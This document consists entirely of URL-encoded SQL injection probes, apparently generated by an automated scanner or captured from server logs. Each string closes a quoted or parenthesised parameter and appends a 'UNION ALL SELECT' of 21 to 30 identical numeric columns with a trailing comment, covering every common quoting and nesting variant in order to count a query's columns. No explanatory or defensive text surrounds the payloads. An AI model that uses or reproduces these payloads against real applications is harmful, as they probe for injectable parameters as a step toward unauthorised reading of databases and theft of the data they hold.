-4730%27%20UNION%20ALL%20SELECT%202284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284%2C2284--%20 -1024%27%20UNION%20ALL%20SELECT%204556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556--%20 -5510%27%20UNION%20ALL%20SELECT%208673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673%2C8673--%20 -2056%27%20UNION%20ALL%20SELECT%202279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279--%20 -7756%27%20UNION%20ALL%20SELECT%207848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848%2C7848--%20 -7864%27%20UNION%20ALL%20SELECT%205241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241--%20 -6247%27%20UNION%20ALL%20SELECT%204163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163--%20 -9761%27%20UNION%20ALL%20SELECT%201488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488%2C1488--%20 -6077%27%20UNION%20ALL%20SELECT%207272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272%2C7272--%20 -2147%22%20UNION%20ALL%20SELECT%206415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415%2C6415--%20 -3701%22%20UNION%20ALL%20SELECT%207563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563--%20 -4406%22%20UNION%20ALL%20SELECT%206626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626%2C6626--%20 -3916%22%20UNION%20ALL%20SELECT%202745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745%2C2745--%20 -9802%22%20UNION%20ALL%20SELECT%205569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569--%20 -1975%22%20UNION%20ALL%20SELECT%201642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642--%20 -7913%22%20UNION%20ALL%20SELECT%208779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779%2C8779--%20 -5013%22%20UNION%20ALL%20SELECT%208352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352--%20 -1699%22%20UNION%20ALL%20SELECT%202964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964%2C2964--%20 -3815%22%20UNION%20ALL%20SELECT%205428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428%2C5428--%20 -3944%29%20UNION%20ALL%20SELECT%207895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895%2C7895--%20 -1594%29%20UNION%20ALL%20SELECT%205737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737--%20 -4869%29%20UNION%20ALL%20SELECT%209649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649%2C9649--%20 -7654%29%20UNION%20ALL%20SELECT%209089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089%2C9089--%20 -9860%29%20UNION%20ALL%20SELECT%206472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472--%20 -5727%29%20UNION%20ALL%20SELECT%202940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940%2C2940--%20 -5633%29%20UNION%20ALL%20SELECT%208042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042--%20 -4938%29%20UNION%20ALL%20SELECT%207262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262--%20 -3163%29%20UNION%20ALL%20SELECT%208319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319--%20 -4448%29%20UNION%20ALL%20SELECT%209036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036--%20 -1942%29%29%20UNION%20ALL%20SELECT%209346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346--%20 -2829%29%29%20UNION%20ALL%20SELECT%203190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190--%20 -3024%29%29%20UNION%20ALL%20SELECT%201669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669%2C1669--%20 -1075%29%29%20UNION%20ALL%20SELECT%204696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696%2C4696--%20 -5670%29%29%20UNION%20ALL%20SELECT%205317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317%2C5317--%20 -5426%29%29%20UNION%20ALL%20SELECT%202912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912--%20 -1124%29%29%20UNION%20ALL%20SELECT%209800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800--%20 -6177%29%29%20UNION%20ALL%20SELECT%202540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540--%20 -7829%29%29%20UNION%20ALL%20SELECT%207768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768%2C7768--%20 -5558%29%29%20UNION%20ALL%20SELECT%208270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270--%20 -3673%29%29%29%20UNION%20ALL%20SELECT%204547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547%2C4547--%20 -3064%29%29%29%20UNION%20ALL%20SELECT%205982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982--%20 -2218%29%29%29%20UNION%20ALL%20SELECT%209048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048%2C9048--%20 -4874%29%29%29%20UNION%20ALL%20SELECT%209184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184%2C9184--%20 -9727%29%29%29%20UNION%20ALL%20SELECT%208347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347%2C8347--%20 -7848%29%29%29%20UNION%20ALL%20SELECT%203728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728--%20 -2981%29%29%29%20UNION%20ALL%20SELECT%206603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603--%20 -2154%29%29%29%20UNION%20ALL%20SELECT%206348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348%2C6348--%20 -8954%29%29%29%20UNION%20ALL%20SELECT%207021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021%2C7021--%20 -3466%29%29%29%20UNION%20ALL%20SELECT%209650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650--%20 -1203%20UNION%20ALL%20SELECT%204989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989--%20 -7516%20UNION%20ALL%20SELECT%205567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567--%20 -5247%20UNION%20ALL%20SELECT%204849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849--%20 -7055%20UNION%20ALL%20SELECT%202793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793--%20 -3764%20UNION%20ALL%20SELECT%208550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550%2C8550--%20 -3862%20UNION%20ALL%20SELECT%208362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362%2C8362--%20 -2382%20UNION%20ALL%20SELECT%208436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436--%20 -1949%20UNION%20ALL%20SELECT%204859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859%2C4859--%20 -6457%20UNION%20ALL%20SELECT%209011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011%2C9011--%20 -3850%20UNION%20ALL%20SELECT%205789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789%2C5789--%20 -9790%27%29%20UNION%20ALL%20SELECT%208887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887--%20 -7398%27%29%20UNION%20ALL%20SELECT%202102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102%2C2102--%20 -3712%27%29%20UNION%20ALL%20SELECT%206794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794%2C6794--%20 -4729%27%29%20UNION%20ALL%20SELECT%207645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645%2C7645--%20 -1968%27%29%20UNION%20ALL%20SELECT%209508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508--%20 -8128%27%29%20UNION%20ALL%20SELECT%203771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771--%20 -1068%27%29%20UNION%20ALL%20SELECT%205218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218%2C5218--%20 -1321%27%29%20UNION%20ALL%20SELECT%203239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239--%20 -7826%27%29%20UNION%20ALL%20SELECT%202631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631--%20 -3475%27%29%20UNION%20ALL%20SELECT%202930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930--%20 -7571%27%29%29%20UNION%20ALL%20SELECT%207789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789--%20 -5551%27%29%29%20UNION%20ALL%20SELECT%202842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842%2C2842--%20 -5460%27%29%29%20UNION%20ALL%20SELECT%203902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902--%20 -6279%27%29%29%20UNION%20ALL%20SELECT%206972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972%2C6972--%20 -6957%27%29%29%20UNION%20ALL%20SELECT%204046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046--%20 -1945%27%29%29%20UNION%20ALL%20SELECT%206366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366%2C6366--%20 -9029%27%29%29%20UNION%20ALL%20SELECT%209665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665--%20 -9080%27%29%29%20UNION%20ALL%20SELECT%203039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039%2C3039--%20 -5445%27%29%29%20UNION%20ALL%20SELECT%205195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195--%20 -1296%27%29%29%20UNION%20ALL%20SELECT%202307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307%2C2307--%20 -6648%27%29%29%29%20UNION%20ALL%20SELECT%206514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514--%20 -6958%27%29%29%29%20UNION%20ALL%20SELECT%208942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942--%20 -6765%27%29%29%29%20UNION%20ALL%20SELECT%206054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054--%20 -9982%27%29%29%29%20UNION%20ALL%20SELECT%201645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645%2C1645--%20 -6797%27%29%29%29%20UNION%20ALL%20SELECT%208746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746%2C8746--%20 -1610%27%29%29%29%20UNION%20ALL%20SELECT%209013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013%2C9013--%20 -8008%27%29%29%29%20UNION%20ALL%20SELECT%204205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205%2C4205--%20 -8289%27%29%29%29%20UNION%20ALL%20SELECT%205739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739--%20 -8657%27%29%29%29%20UNION%20ALL%20SELECT%203050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050--%20 -1020%27%29%29%29%20UNION%20ALL%20SELECT%206943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943%2C6943--%20 -6303%27%20UNION%20ALL%20SELECT%206019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019--%20 -8824%27%20UNION%20ALL%20SELECT%203288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288%2C3288--%20 -3854%27%20UNION%20ALL%20SELECT%209047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047%2C9047--%20 -9140%27%20UNION%20ALL%20SELECT%208881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881%2C8881--%20 -8457%27%20UNION%20ALL%20SELECT%206809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809--%20 -7312%27%20UNION%20ALL%20SELECT%205970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970--%20 -6468%27%20UNION%20ALL%20SELECT%201795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795%2C1795--%20 -2555%27%20UNION%20ALL%20SELECT%203717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717%2C3717--%20 -8194%27%20UNION%20ALL%20SELECT%202960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960%2C2960--%20 